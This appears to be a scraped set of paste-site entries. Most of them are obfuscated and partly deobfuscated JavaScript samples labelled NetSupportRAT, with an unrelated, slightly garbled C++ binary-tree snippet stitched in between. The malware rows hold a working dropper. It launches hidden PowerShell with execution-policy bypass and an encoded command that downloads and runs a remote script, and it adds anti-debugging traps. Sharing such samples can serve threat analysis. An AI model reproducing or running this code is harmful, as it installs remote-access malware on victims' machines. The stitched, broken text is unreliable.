""sheLl""; YZqOsTxnMmpABJCF = new ActiveXObject(oMKilXfTnLOHCUhAFBP+"".""+ //IxqOgMKi +""ApPlIcAtIon""); FkLgcBCiVTGsmxdvpeb = new ActiveXObject(""SCRiPtIng.filesystemobJECt""); if (FkLgcBCiVTGsmxdvpeb.FolderExists(""C:\\pROgRa""+ //IxqOgMKi +""mdAta\\mIcRosOft\\wINdoWs"")) { +//YhALZvBkfyGVcEPoHRNqIM +YZqOsTxnMmpABJCF.ShellExecute(""cmd"", ""/c""+ //IxqOgMKi +"" Power""+oMKilXfTnLOHCUhAFBP+"" -nop -w hidden ""+ //IxqOgMKi +""-ep bypaSS -enC SQ""+ //IxqOgMKi +""BFAFgAIAAoA""+ //IxqOgMKi +""E4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAb""+ //IxqOgMKi +""gB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHI""+ //IxqOgMKi +""AaQBuAGcAKA""+ //IxqOgMKi +""AiAGgAdAB0AHAA""+ //IxqOgMKi +""OgAvAC8""+ //IxqOgMKi +""AMQBvAHQ""+ //IxqOgMKi +""AYQBsAC4AYwBvAG0ALwBpAG4AZABlAHgALwBpAG4AZA""+ //IxqOgMKi +""BlAHgALgBwAGgAcAAiACkA"", """", ""open"", 0); } +//kdbyVceRuXIHitqmTjngWxOZAG +//UmExrsgJuDvLhVadkAWOTICPXF +oMKilXfTnLOHCUhAFBP = ""sheLl""; YZqOsTxnMmpABJCF = new ActiveXObject(oMKilXfTnLOHCUhAFBP+"".""+ //IxqOgMKi +""ApPlIcAtIon""); FkLgcBCiVTGsmxdvpeb = new ActiveXObject(""SCRiPtIng.filesystemobJECt""); if (FkLgcBCiVTGsmxdvpeb.FolderExists(""C:\\pROgRa""+ //IxqOgMKi +""mdAta\\mIcRosOft\\wINdoWs"")) { +//YhALZvBkfyGVcEPoHRNqIM +YZqOsTxnMmpABJCF.ShellExecute(""cmd"", ""/c""+ //IxqOgMKi +"" Power""+oMKilXfTnLOHCUhAFBP+"" -nop -w hidden ""+ //IxqOgMKi +""-ep bypaSS -enC SQ""+ //IxqOgMKi +""BFAFgAIAAoA""+ //IxqOgMKi +""E4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAb""+ //IxqOgMKi +""gB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHI""+ //IxqOgMKi +""AaQBuAGcAKA""+ //IxqOgMKi +""AiAGgAdAB0AHAA""+ //IxqOgMKi +""OgAvAC8""+ //IxqOgMKi +""AMQBvAHQ""+ //IxqOgMKi +""AYQBsAC4AYwBvAG0ALwBpAG4AZABlAHgALwBpAG4AZA""+ //IxqOgMKi +""BlAHgALgBwAGgAcAAiACkA"", """", ""open"", 0); } +//kdbyVceRuXIHitqmTjngWxOZAG" +xmRZ8aHC,NetSupportRAT - Obfuscated JavaScript - Deobfuscated 1,brianyaucy,JavaScript,Thursday 2nd of November 2023 11:12:15 AM CDT,"(function (b, W) { + var B = b(); + while (true) { + try { + var N = parseInt(Y(48, 165)) / 1 + parseInt(Y(65, 124)) / 2 * (parseInt(Y(19, -379)) / 3) + parseInt(Y(24, 56)) / 4 + -parseInt(Y(23, -521)) / 5 * (parseInt(Y(104, -370)) / 6) + -parseInt(Y(68, -261)) / 7 + -parseInt(Y(28, -303)) / 8 * (parseInt(Y(56, -797)) / 9) + -parseInt(Y(67, -228)) / 10; + if (N === W) { + break; + } else { + B.push(B.shift()); + } + } catch (q) { + B.push(B.shift()); + } + } +}(O, 606267)); +var A = function () { + var b = {CmVKp: function (B, N) { + return B === N; + }, dhUiW: Y(9, 333), JbVAq: Y(60, -876), pLoZe: function (B, N) { + return B === N; + }, NAFkU: ""OHOkP"", nmlGo: ""nDrDW""}; + var W = true; + return function (B, N) { + var q = {ILmuy: function (e, I) { + return b[Y(94, -360)](e, I); + }, ZEqcw: b[Y(36, 997)], yJqRM: b[Y(98, -645)], JmtSj: function (e, I) { + return b[Y(54, 677)](e, I); + }, cTmzO: b.NAFkU}; + if (b[Y(88, 487)] === b.nmlGo) { + var m = W ? function () { + if (q.ILmuy(q[Y(45, -403)], q[Y(3, -521)])) { + if (q) { + var D = D[Y(108, 24)](d, arguments); + Z = null; + return D; + } + } else { + if (N) { + if (q.JmtSj(Y(10, -376), q[Y(51, -476)])) { + var e = N[Y(108, -594)](B, arguments); + N = null; + return e; + } else { + return function (d) {}[Y(1, -438)](""while (true) {}"")[Y(108, -340)](""counter""); + } + } + } + } : function () {}; + W = false; + return m; + } else { + return true; + } + }; +}(); +function O() { + var Ej = [""xzivN"", ""EMVnf"", ""TKMJE"", ""qpHsS"", ""counter"", ""BsQeg"", ""jSVZi"", ""diyER"", ""0A>22AaQBuAGcAKA>22>2B>20>2F>2FIxqOgMKi>0D>0A>22AiAGgAdAB>30AHAA>22>2B>20>2F>2"", ""aEmpj"", ""VAfXH"", ""test"", ""hvuUh"", "">0D>0A>22gB>30ACkALgBkAG>38AdwBuAGwA"", ""0>28FkLgcBCiVTGsmxdvpeb>2E"", ""FvWEp"", ""nmlGo"", ""MDYYX"", ""SQUdq"", ""qgVlR"", ""gger"", ""action"", ""CmVKp"", ""KpSDg"", "">2FIxqOgMKi>0D>0A>22E>34AZQB>33AC>30ATwBiAGoAZ"", ""M>0D>"", ""JbVAq"", ""2FIxqOgMKi>0D>0A>22AMQBvAHQ>22>2B>20>2F>2FIxqOgMKi"", ""0ActiveXObject>28>22SCRiPtIng>2EfilesystemobJECt>22>29>3B>20if>2"", ""bwBhAGQAcwB>30AHI>22>2B>20>2F"", ""sQLsM"", ""UUQHX"", ""703572UzyMoT"", ""xufeS"", ""EbuFJ"", ""IpBML"", ""apply"", ""length"", ""function *\\( *\\)"", ""constructor"", ""FkzBa"", ""yJqRM"", ""kqFyP"", "">2FIxqOgMKi>0D>"", ""FolderExists>28>22C>3A>5C"", ""Bybcj"", ""aTzWI"", ""dxLPY"", ""OHOkP"", ""qbIjJ"", ""G>34AZA>22>2B>20>2F>2FIxq"", ""FUmExrsgJuDvLhVadkAWOTICPXF>0D>0AoMKilXfTnLOHCUhAFBP>20>3D>20>22sheLl>22>3B>"", ""OgMKi>0D>0A>22BlAHgALgBwAGgAcAAiACkA>22>2C>20>22>22>2C>20>22open>22>2C>20>30>29>3B>20>7D>0D>0A>2F>2FkdbyVceRuXIHitqmTjngWxOZAG"", ""zWdcO"", ""20>2F>2FIxqOgMKi>0D>0A>22BFAFg"", ""GbOcN"", ""nQUhN"", ""1011759EmQrrQ"", ""PybAt"", ""chain"", ""Mpbyu"", ""25DZYdzX"", ""4803340ZpxPTT"", ""pUbcq"", "">22"", ""20YZqOsTxnMmpABJCF>20>3D>20new>20ActiveXObject>28oMKilXfTnLOH"", ""24nuhbzG"", ""lzhVP"", ""Lwira"", ""WIOII"", ""replace"", ""AIAAoA>22>2B>20>2F"", ""wYRJD"", ""xJWUU"", ""dhUiW"", ""mGTTZ"", ""2B>22>20>2"", ""AZQBiAGMAb"", ""LgcBCiVTGsmxdvpe"", ""OTSWY"", ""gUWzv"", ""vwIZR"", ""uRqzM"", ""ZEqcw"", ""\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)"", ""init"", ""56371UHBMAd"", ""22>2Fc"", ""stateObject"", ""cTmzO"", ""while (true) {}"", ""OTDiM"", ""pLoZe"", ""pYymh"", ""1759752YocCuj"", ""input"", ""Bcdqr"", ""QJSGX"", ""DLGuQ"", ""iALmo"", ""ABpAGUAb>22>2B>20>2F>2FIxqOgMKi"", ""BhxNi"", ""WwsZx"", ""4AXbKzr"", ""call"", ""1468840CAueJG"", ""39669lNjGPn"", ""yCjCK"", ""HWrFV"", ""naPSm""]; + O = function () { + return Ej; + }; + return O(); +} +(function () { + var b = {xzivN: Y(0, -399), gUWzv: function (W, B) { + return W(B); + }, JNjyC: Y(47, -315), FkzBa: function (W, B) { + return W + B; + }, VAfXH: function (W, B) { + return W(B); + }, Bybcj: function (W, B) { + return W !== B; + }, WIOII: Y(87, 344), HWrFV: Y(11, -995), KpSDg: ""chain"", Mpbyu: ""input"", aqbfU: ""YfSLD"", vwIZR: function (W, B) { + return W === B; + }, BsQeg: Y(74, -915), xufeS: function (W) { + return W(); + }}; + A(this, function () { + if (b[Y(7, 160)](b[Y(31, 1026)], b[Y(70, -891)])) { + var W = new RegExp(b.xzivN); + var B = new RegExp(Y(46, -871), ""i""); + var N = b[Y(42, -919)](E, b.JNjyC); + if (!W[Y(83, 1070)](b[Y(2, 612)](N, b[Y(95, -787)])) || !B[Y(83, 659)](N + b[Y(22, 625)])) { + if (b.Bybcj(b.aqbfU, Y(34, -876))) { + N(""0""); + } else { + var m = e ? function () { + if (m) { + var R = u.apply(h, arguments); + F = null; + return R; + } + } : function () {}; + G = false; + return m; + } + } else { + if (b[Y(43, -890)](b[Y(77, -625)], b.BsQeg)) { + b[Y(105, -418)](E); + } else { + var e = new q(b[Y(72, -895)]); + var I = new m(Y(46, -839), ""i""); + var D = b.gUWzv(e, b.JNjyC); + if (!e[Y(83, -810)](b[Y(2, -962)](D, Y(21, -727))) || !I.test(b[Y(2, -881)](D, Y(57, 1022)))) { + D(""0""); + } else { + D(); + } + } + } + } else { + if (N) { + return e; + } else { + b[Y(82, -875)](I, 0); + } + } + })(); +}()); +var YLJajsi = "">2F>2"" + Y(13, -99) + Y(27, 609) + ""CUhAFBP>2B>22>2E>22>2B>20>2F>2FIxqOgMKi>0D>0A>22ApPlIcAtIon>22>29>3B>20Fk"" + Y(40, 685) + ""b>20>3D>20new>2"" + Y(100, 355) + Y(86, -32) + Y(6, -124) + "">5CpROgRa>22>2B>2"" + ""0>2F>2FIxqOgMKi>0D>0A>22mdAta>5C>5CmIcRosOft>5C>5CwINdoWs>22>29>29>2"" + ""0>7B>0D>0A>2F>"" + ""2FYhALZvBkf"" + ""yGVcEPoHRNqI"" + Y(97, 587) + ""0AYZqOsTxnMmpABJCF>2EShellExecute>28>22cmd>22>2C>20>"" + Y(49, 299) + Y(26, -104) + "">2B>20>2F>2FIxq"" + ""OgMKi>0D>0A>22>20Power>22>2BoMKilXfTnLOHCUhAFBP>"" + Y(38, 343) + ""D"" + ""nop>20>2Dw>20hidden>20>22>2B>20>2F>2FIxqOgMKi>0D>0A>22>2Dep>20bypaSS>20>2DenC>20SQ>22>2B>"" + Y(16, 668) + Y(33, -34) + Y(96, 360) + ""QBjAHQAIABOAGUAdAAuAFc"" + Y(39, 641) + Y(62, -1) + Y(85, -107) + Y(101, 527) + Y(5, -114) + Y(80, -914) + ""FIxqOgMKi>0D>0A>22OgAvAC>38>22"" + "">2B>"" + ""20>2F>"" + Y(99, 327) + "">0"" + ""D>0A>22AYQBsAC>34AYwBvAG>30ALwBpAG>34AZABlAHg"" + ""ALwBpA"" + Y(12, 336) + Y(14, 629); +tuKEfrH = unescape(YLJajsi[Y(32, 636)](/\>/g, ""%"")); +function Y(E, A) { + var b = O(); + Y = function (W, B) { + W = W - 0; + var N = b[W]; + return N; + }; + return Y(E, A); +} +YLJajsi = eval(tuKEfrH); +function E(b) { + var W = {zWdcO: ""debu"", RguDL: function (N) { + return N(); + }, EMVnf: function (N, q) { + return N === q; + }, Lwira: Y(63, -72), tvMuP: function (N, q) { + return N(q); + }, ZElGq: Y(0, -224), kqFyP: function (N, q) { + return N(q); + }, sQLsM: Y(17, -862), SQUdq: function (N, q) { + return N === q; + }, diyER: function (N, q) { + return N !== q; + }, ElDVP: Y(69, -897), nQUhN: Y(76, -119), lzhVP: ""NMgRb"", pUbcq: ""tISlQ"", xJWUU: function (N, q) { + return N !== q; + }, aEmpj: function (N, q) { + return N / q; + }, pYGcF: Y(109, -840), fSumB: function (N, q) { + return N % q; + }, YtxWF: function (N, q) { + return N !== q; + }, mGTTZ: Y(103, -856), hvuUh: function (N, q) { + return N + q; + }, wEPJt: Y(93, -557), MDYYX: Y(41, -882), aTzWI: Y(92, -803), PybAt: ""stateObject"", qrCPF: Y(71, -756), jSVZi: function (N, q) { + return N === q; + }, QJSGX: Y(61, -769), Bcdqr: Y(44, -793)}; + function B(N) { + var q = {SfkWs: function (m, e) { + return W.tvMuP(m, e); + }, qhoqJ: function (m, e) { + return m === e; + }, QIekA: Y(106, -188), ZXYKK: function (m, e) { + return m(e); + }, exPOH: W.ZElGq, eSdVT: function (m, e) { + return W[Y(4, 552)](m, e); + }, RTXbT: function (m, e) { + return m + e; + }, WwsZx: Y(57, 883), OTDiM: function (m) { + return m(); + }}; + if (""qHdRH"" !== W[Y(102, -213)]) { + if (W[Y(90, 984)](typeof N, ""string"")) { + if (W.diyER(W.ElDVP, ""yCjCK"")) { + var I = N.apply(q, arguments); + m = null; + return I; + } else { + return function (e) {}[Y(1, -675)](Y(52, -283))[Y(108, 1028)](W[Y(18, -500)]); + } + } else { + if (W[Y(29, -952)] !== W[Y(25, -944)]) { + if (W[Y(35, -863)](("""" + W[Y(81, -268)](N, N))[W.pYGcF], 1) || W[Y(73, -673)](W.fSumB(N, 20), 0)) { + if (W.YtxWF(Y(75, -836), W[Y(37, 961)])) { + (function () { + if (q.qhoqJ(q.QIekA, Y(91, 249))) { + q.SfkWs(W, ""0""); + } else { + return true; + } + }.constructor(W[Y(84, 995)](W.zWdcO, Y(92, 970)))[Y(66, -587)](W.wEPJt)); + } else { + (function () { + return false; + }[Y(1, -422)](W[Y(15, 451)] + Y(92, -224))[Y(108, 1002)](Y(50, 405))); + } + } else { + if (W[Y(89, -203)] !== ""eEfTx"") { + (function () { + var I = {wWTHo: function (D) { + return W.RguDL(D); + }}; + if (W[Y(73, -268)](Y(63, -175), W[Y(30, -125)])) { + return false; + } else { + I.wWTHo(W); + } + }[Y(1, -411)](""debu"" + W[Y(8, 395)])[Y(108, -571)](W[Y(20, -429)])); + } else { + return false; + } + } + } else { + q.ZXYKK(W, 0); + } + } + B(++N); + } else { + var Z = {pYymh: q.exPOH, IxZcP: Y(46, -308), kWlXl: function (G, r) { + return q.eSdVT(G, r); + }, IpBML: function (G, r) { + return q.RTXbT(G, r); + }, UJXkI: q[Y(64, -918)], TDDLu: function (G) { + return q[Y(53, 940)](G); + }}; + m(this, function () { + var F = new Z(Z[Y(55, 309)]); + var l = new G(Z.IxZcP, ""i""); + var R = Z.kWlXl(r, Y(47, 10)); + if (!F[Y(83, 332)](R + ""chain"") || !l.test(Z[Y(107, -686)](R, Z.UJXkI))) { + R(""0""); + } else { + Z.TDDLu(v); + } + })(); + } + } + try { + if (b) { + if (W[Y(79, -548)](""naPSm"", W.qrCPF)) { + return W; + } else { + return B; + } + } else { + if (W[Y(78, -77)](W[Y(59, -694)], W[Y(58, -735)])) { + (function () { + return true; + }[Y(1, 157)](W.hvuUh(W[Y(15, -607)], W[Y(8, -217)]))[Y(66, -836)](Y(93, -848))); + } else { + B(0); + } + } + } catch (m) {} +} +" +mf3zf8QP,Untitled,parv28,C++,Thursday 2nd of November 2023 11:08:08 AM CDT,"/* +class TreeNode { + public: + int data; + TreeNode* left; + TreeNode* right; + + TreeNode() { + this->left = this->right = NULL; + } + + TreeNode(int data) { + this->data = data; + this->left = this->right = NULL; + } + + TreeNode(int data, TreeNode* left, TreeNode* right) { + this->data = data; + this->left = left; + this->right = right; + } +}; +*/ + +class Solution { +public: + void inorder(TreeNode* root, int k, int &index, int &ans) { + if(root==nullptr) return; + inorder(root->left, k, index, ans); + // cout<<""index: ""<data<data; + } + index++; + inorder(root->right, k, index, ans); + } + + int kthSmallest(TreeNode* & root, int k) { + int index = 0, ans; + inorder(root, k, index, ans); + return ans; + } +};" +yjpMyUWD,NetSupportRAT - Obfuscated JavaScript,brianyaucy,JavaScript,Thursday 2nd of November 2023 11:02:55 AM CDT,"function E7(b, W, B, N, q, m, e) { + return Y(m - 0x268, q); +} +(function (b, W) { + function c(b, W, B, N, q, m, e) { + return Y(B - -0x37e, b); + } + function U(b, W, B, N, q, m, e) { + return Y(B - 0x20b, m); + } + function j(b, W, B, N, q, m, e) { + return Y(W - -0x17a, e); + } + function n(b, W, B, N, q, m, e) { + return Y(e - -0x129, B); + } + var B = b(); + function o(b, W, B, N, q, m, e) { + return Y(B - 0x56, N); + } + function f(b, W, B, N, q, m, e) { + return Y(W - -0x152, B); + } + function p(b, W, B, N, q, m, e) { + return Y(B - -0x206, q); + } + while (!![]) { + try { + var N = parseInt(o(0x52, 0x7d, 0x86, 0xa5, 0x60, 0x65, 0x94)) / 0x1 + parseInt(o(0xcb, 0x9b, 0x97, 0x7c, 0x68, 0x84, 0x73)) / 0x2 * (parseInt(j(-0x14c, -0x167, -0x197, -0x181, -0x171, -0x141, -0x17b)) / 0x3) + parseInt(o(0x53, 0x47, 0x6e, 0x38, 0x65, 0xa1, 0x77)) / 0x4 + -parseInt(p(-0x225, -0x220, -0x1ef, -0x1e9, -0x209, -0x21c, -0x210)) / 0x5 * (parseInt(p(-0x194, -0x19b, -0x19e, -0x1c9, -0x172, -0x181, -0x1b9)) / 0x6) + -parseInt(n(-0x103, -0xfd, -0x105, -0xd2, -0xe0, -0xf8, -0xe5)) / 0x7 + -parseInt(n(-0x121, -0x134, -0x12f, -0x118, -0xf8, -0x144, -0x10d)) / 0x8 * (parseInt(c(-0x31d, -0x32d, -0x346, -0x372, -0x35b, -0x342, -0x31d)) / 0x9) + -parseInt(f(-0xee, -0x10f, -0xe4, -0x12f, -0xff, -0x124, -0x126)) / 0xa; + if (N === W) { + break; + } else { + B['push'](B['shift']()); + } + } catch (q) { + B['push'](B['shift']()); + } + } +}(O, 0x9403b)); +var A = (function () { + var b = { + 'CmVKp': function (B, N) { + return B === N; + }, + 'dhUiW': P(0x19b, 0x166, 0x16c, 0x14d, 0x170, 0x142, 0x19a), + 'JbVAq': H(-0x36c, -0x340, -0x358, -0x32e, -0x31a, -0x342, -0x35e), + 'pLoZe': function (B, N) { + return B === N; + }, + 'NAFkU': 'OHOkP', + 'nmlGo': 'nDrDW' + }; + function H(b, W, B, N, q, m, e) { + return Y(m - -0x37e, b); + } + var W = !![]; + function P(b, W, B, N, q, m, e) { + return Y(B - 0x163, N); + } + return function (B, N) { + var q = { + 'ILmuy': function (e, I) { + function y(b, W, B, N, q, m, e) { + return Y(q - -0x194, e); + } + return b[y(-0x148, -0x12f, -0x103, -0x158, -0x136, -0x129, -0x168)](e, I); + }, + 'ZEqcw': b[M(0x3bf, 0x3a4, 0x3cf, 0x3c0, 0x3e5, 0x3bd, 0x3bf)], + 'yJqRM': b[k(-0x254, -0x275, -0x221, -0x240, -0x285, -0x25c, -0x283)], + 'JmtSj': function (e, I) { + function x(b, W, B, N, q, m, e) { + return k(m - 0x4f4, W - 0x18c, B - 0x32, N - 0x17f, N, m - 0x5d, e - 0x17b); + } + return b[x(0x298, 0x241, 0x297, 0x2a5, 0x24e, 0x274, 0x26a)](e, I); + }, + 'cTmzO': b['NAFkU'] + }; + function M(b, W, B, N, q, m, e) { + return H(q, W - 0x1be, B - 0x50, N - 0x168, q - 0x91, e - 0x719, e - 0x122); + } + function t(b, W, B, N, q, m, e) { + return H(e, W - 0xce, B - 0x1b2, N - 0xb1, q - 0x2f, m - 0x4ed, e - 0x175); + } + function k(b, W, B, N, q, m, e) { + return P(b - 0x98, W - 0x9, b - -0x419, q, q - 0x132, m - 0x2f, e - 0x1ef); + } + if (b[t(0x1a9, 0x192, 0x1a0, 0x1aa, 0x1ec, 0x1c7, 0x1e7)] === b['nmlGo']) { + var m = W ? function () { + function X(b, W, B, N, q, m, e) { + return t(b - 0x2a, W - 0x102, B - 0x1b8, N - 0x1b3, q - 0x120, B - -0x34d, b); + } + function T(b, W, B, N, q, m, e) { + return M(b - 0x183, W - 0x34, B - 0x1d3, N - 0xc0, e, m - 0xb4, m - -0x730); + } + function Q(b, W, B, N, q, m, e) { + return k(B - 0x145, W - 0x122, B - 0xc, N - 0x11, N, m - 0x142, e - 0x191); + } + function w(b, W, B, N, q, m, e) { + return M(b - 0x58, W - 0xd3, B - 0x113, N - 0xb2, q, m - 0x178, e - -0x634); + } + function a(b, W, B, N, q, m, e) { + return k(m - 0x62, W - 0x17, B - 0xe, N - 0x1f1, b, m - 0xb8, e - 0x4e); + } + function V(b, W, B, N, q, m, e) { + return t(b - 0x19e, W - 0xdf, B - 0x137, N - 0xde, q - 0x42, q - -0x264, e); + } + function C(b, W, B, N, q, m, e) { + return k(b - 0x26c, W - 0x160, B - 0xce, N - 0xaa, W, m - 0x164, e - 0xc0); + } + if (q['ILmuy'](q[X(-0x193, -0x1e4, -0x1b1, -0x1a8, -0x1d7, -0x184, -0x1c2)], q[X(-0x209, -0x1d4, -0x1db, -0x1db, -0x1ae, -0x1ce, -0x1b7)])) { + if (q) { + var D = D[C(0x22, 0x18, 0x3a, -0x15, -0x7, 0x41, 0x29)](d, arguments); + Z = null; + return D; + } + } else { + if (N) { + if (q['JmtSj'](Q(-0x191, -0x17f, -0x167, -0x178, -0x19a, -0x186, -0x149), q[X(-0x1dc, -0x1dd, -0x1ab, -0x181, -0x19e, -0x1c2, -0x1ce)])) { + var e = N[w(-0x1fd, -0x20e, -0x1fc, -0x260, -0x252, -0x204, -0x22d)](B, arguments); + N = null; + return e; + } else { + return function (d) { + }[X(-0x1b6, -0x20b, -0x1dd, -0x1ca, -0x206, -0x1c8, -0x1af)]('while\x20(true)\x20{}')[X(-0x154, -0x153, -0x172, -0x184, -0x154, -0x192, -0x1a4)]('counter'); + } + } + } + } : function () { + }; + W = ![]; + return m; + } else { + return !![]; + } + }; +}()); +function E8(b, W, B, N, q, m, e) { + return Y(e - 0x112, b); +} +function O() { + var Ej = [ + 'xzivN', + 'EMVnf', + 'TKMJE', + 'qpHsS', + 'counter', + 'BsQeg', + 'jSVZi', + 'diyER', + '0A>22AaQBuAGcAKA>22>2B>20>2F>2FIxqOgMKi>0D>0A>22AiAGgAdAB>30AHAA>22>2B>20>2F>2', + 'aEmpj', + 'VAfXH', + 'test', + 'hvuUh', + '>0D>0A>22gB>30ACkALgBkAG>38AdwBuAGwA', + '0>28FkLgcBCiVTGsmxdvpeb>2E', + 'FvWEp', + 'nmlGo', + 'MDYYX', + 'SQUdq', + 'qgVlR', + 'gger', + 'action', + 'CmVKp', + 'KpSDg', + '>2FIxqOgMKi>0D>0A>22E>34AZQB>33AC>30ATwBiAGoAZ', + 'M>0D>', + 'JbVAq', + '2FIxqOgMKi>0D>0A>22AMQBvAHQ>22>2B>20>2F>2FIxqOgMKi', + '0ActiveXObject>28>22SCRiPtIng>2EfilesystemobJECt>22>29>3B>20if>2', + 'bwBhAGQAcwB>30AHI>22>2B>20>2F', + 'sQLsM', + 'UUQHX', + '703572UzyMoT', + 'xufeS', + 'EbuFJ', + 'IpBML', + 'apply', + 'length', + 'function\x20*\x5c(\x20*\x5c)', + 'constructor', + 'FkzBa', + 'yJqRM', + 'kqFyP', + '>2FIxqOgMKi>0D>', + 'FolderExists>28>22C>3A>5C', + 'Bybcj', + 'aTzWI', + 'dxLPY', + 'OHOkP', + 'qbIjJ', + 'G>34AZA>22>2B>20>2F>2FIxq', + 'FUmExrsgJuDvLhVadkAWOTICPXF>0D>0AoMKilXfTnLOHCUhAFBP>20>3D>20>22sheLl>22>3B>', + 'OgMKi>0D>0A>22BlAHgALgBwAGgAcAAiACkA>22>2C>20>22>22>2C>20>22open>22>2C>20>30>29>3B>20>7D>0D>0A>2F>2FkdbyVceRuXIHitqmTjngWxOZAG', + 'zWdcO', + '20>2F>2FIxqOgMKi>0D>0A>22BFAFg', + 'GbOcN', + 'nQUhN', + '1011759EmQrrQ', + 'PybAt', + 'chain', + 'Mpbyu', + '25DZYdzX', + '4803340ZpxPTT', + 'pUbcq', + '>22', + '20YZqOsTxnMmpABJCF>20>3D>20new>20ActiveXObject>28oMKilXfTnLOH', + '24nuhbzG', + 'lzhVP', + 'Lwira', + 'WIOII', + 'replace', + 'AIAAoA>22>2B>20>2F', + 'wYRJD', + 'xJWUU', + 'dhUiW', + 'mGTTZ', + '2B>22>20>2', + 'AZQBiAGMAb', + 'LgcBCiVTGsmxdvpe', + 'OTSWY', + 'gUWzv', + 'vwIZR', + 'uRqzM', + 'ZEqcw', + '\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)', + 'init', + '56371UHBMAd', + '22>2Fc', + 'stateObject', + 'cTmzO', + 'while\x20(true)\x20{}', + 'OTDiM', + 'pLoZe', + 'pYymh', + '1759752YocCuj', + 'input', + 'Bcdqr', + 'QJSGX', + 'DLGuQ', + 'iALmo', + 'ABpAGUAb>22>2B>20>2F>2FIxqOgMKi', + 'BhxNi', + 'WwsZx', + '4AXbKzr', + 'call', + '1468840CAueJG', + '39669lNjGPn', + 'yCjCK', + 'HWrFV', + 'naPSm' + ]; + O = function () { + return Ej; + }; + return O(); +} +(function () { + var b = { + 'xzivN': L(-0x196, -0x1b0, -0x18e, -0x18f, -0x1ca, -0x1cb, -0x1ac), + 'gUWzv': function (W, B) { + return W(B); + }, + 'JNjyC': L(-0x167, -0x149, -0x17f, -0x13b, -0x14c, -0x16c, -0x18e), + 'FkzBa': function (W, B) { + return W + B; + }, + 'VAfXH': function (W, B) { + return W(B); + }, + 'Bybcj': function (W, B) { + return W !== B; + }, + 'WIOII': g(0x18d, 0x151, 0x19d, 0x16b, 0x163, 0x183, 0x158), + 'HWrFV': S(-0x3e3, -0x3c0, -0x3bd, -0x3d8, -0x3e1, -0x3fa, -0x3ec), + 'KpSDg': 'chain', + 'Mpbyu': 'input', + 'aqbfU': 'YfSLD', + 'vwIZR': function (W, B) { + return W === B; + }, + 'BsQeg': S(-0x393, -0x398, -0x373, -0x399, -0x3bf, -0x3a1, -0x379), + 'xufeS': function (W) { + return W(); + } + }; + function L(b, W, B, N, q, m, e) { + return Y(b - -0x196, N); + } + function s(b, W, B, N, q, m, e) { + return Y(B - 0x83, W); + } + function S(b, W, B, N, q, m, e) { + return Y(N - -0x3e3, b); + } + function g(b, W, B, N, q, m, e) { + return Y(N - 0x114, e); + } + function i(b, W, B, N, q, m, e) { + return Y(N - -0x25f, q); + } + A(this, function () { + function E5(b, W, B, N, q, m, e) { + return g(b - 0x100, W - 0x45, B - 0x150, W - -0x408, q - 0xf2, m - 0x4f, m); + } + function E3(b, W, B, N, q, m, e) { + return i(b - 0x15d, W - 0x16c, B - 0x1c4, m - 0x4b0, N, m - 0xd3, e - 0xdb); + } + function E2(b, W, B, N, q, m, e) { + return s(b - 0x160, b, e - -0x423, N - 0xe5, q - 0x198, m - 0xe0, e - 0x1af); + } + function E1(b, W, B, N, q, m, e) { + return S(W, W - 0x1cd, B - 0x136, B - 0x44, q - 0x14a, m - 0x80, e - 0x12c); + } + function E4(b, W, B, N, q, m, e) { + return s(b - 0x1df, e, W - -0x266, N - 0x114, q - 0x12e, m - 0x1e9, e - 0x4a); + } + function K(b, W, B, N, q, m, e) { + return S(B, W - 0x158, B - 0xca, e - 0x497, q - 0xa9, m - 0x138, e - 0xde); + } + function E0(b, W, B, N, q, m, e) { + return s(b - 0x11f, W, B - 0x359, N - 0x1a6, q - 0xba, m - 0xa1, e - 0x63); + } + if (b[K(0xd2, 0xd9, 0xa0, 0xbb, 0xee, 0xda, 0xbb)](b[E0(0x425, 0x402, 0x3fb, 0x41e, 0x423, 0x418, 0x3e5)], b[E1(-0x390, -0x37b, -0x359, -0x379, -0x386, -0x382, -0x373)])) { + var W = new RegExp(b['xzivN']); + var B = new RegExp(E2(-0x367, -0x380, -0x366, -0x3a4, -0x3a3, -0x34e, -0x372), 'i'); + var N = b[E2(-0x397, -0x3a5, -0x36b, -0x359, -0x39b, -0x3ab, -0x376)](E, b['JNjyC']); + if (!W[E0(0x45a, 0x42e, 0x42f, 0x400, 0x3fa, 0x408, 0x420)](b[E3(0x238, 0x244, 0x235, 0x264, 0x227, 0x253, 0x252)](N, b[E2(-0x313, -0x354, -0x36c, -0x368, -0x334, -0x353, -0x341)])) || !B[E3(0x2ba, 0x29c, 0x288, 0x293, 0x2a6, 0x2a4, 0x2b9)](N + b[E3(0x246, 0x247, 0x281, 0x271, 0x249, 0x267, 0x26b)])) { + if (b['Bybcj'](b['aqbfU'], E2(-0x36c, -0x370, -0x361, -0x38b, -0x35e, -0x3ae, -0x37e))) { + N('0'); + } else { + var m = e ? function () { + if (m) { + var R = u['apply'](h, arguments); + F = null; + return R; + } + } : function () { + }; + G = ![]; + return m; + } + } else { + if (b[E1(-0x355, -0x37a, -0x374, -0x353, -0x35f, -0x34d, -0x33d)](b[E5(-0x2a5, -0x2a7, -0x2ad, -0x2c7, -0x298, -0x271, -0x2b1)], b['BsQeg'])) { + b[E4(-0x175, -0x17a, -0x158, -0x1a6, -0x18f, -0x143, -0x1a2)](E); + } else { + var e = new q(b[E1(-0x34d, -0x37f, -0x357, -0x34a, -0x337, -0x364, -0x34c)]); + var I = new m(E1(-0x38f, -0x347, -0x371, -0x3a8, -0x3a0, -0x34b, -0x35c), 'i'); + var D = b['gUWzv'](e, b['JNjyC']); + if (!e[E2(-0x32a, -0x329, -0x36e, -0x35f, -0x378, -0x332, -0x34d)](b[E1(-0x37a, -0x3c2, -0x39d, -0x382, -0x375, -0x39e, -0x398)](D, E5(-0x300, -0x2df, -0x2be, -0x2d4, -0x2b3, -0x2d7, -0x2ef))) || !I['test'](b[E2(-0x371, -0x3d0, -0x389, -0x386, -0x398, -0x3a0, -0x39e)](D, E0(0x3ea, 0x3fe, 0x415, 0x411, 0x3f6, 0x429, 0x3e0)))) { + D('0'); + } else { + D(); + } + } + } + } else { + if (N) { + return e; + } else { + b[E2(-0x36b, -0x34f, -0x374, -0x35c, -0x382, -0x32e, 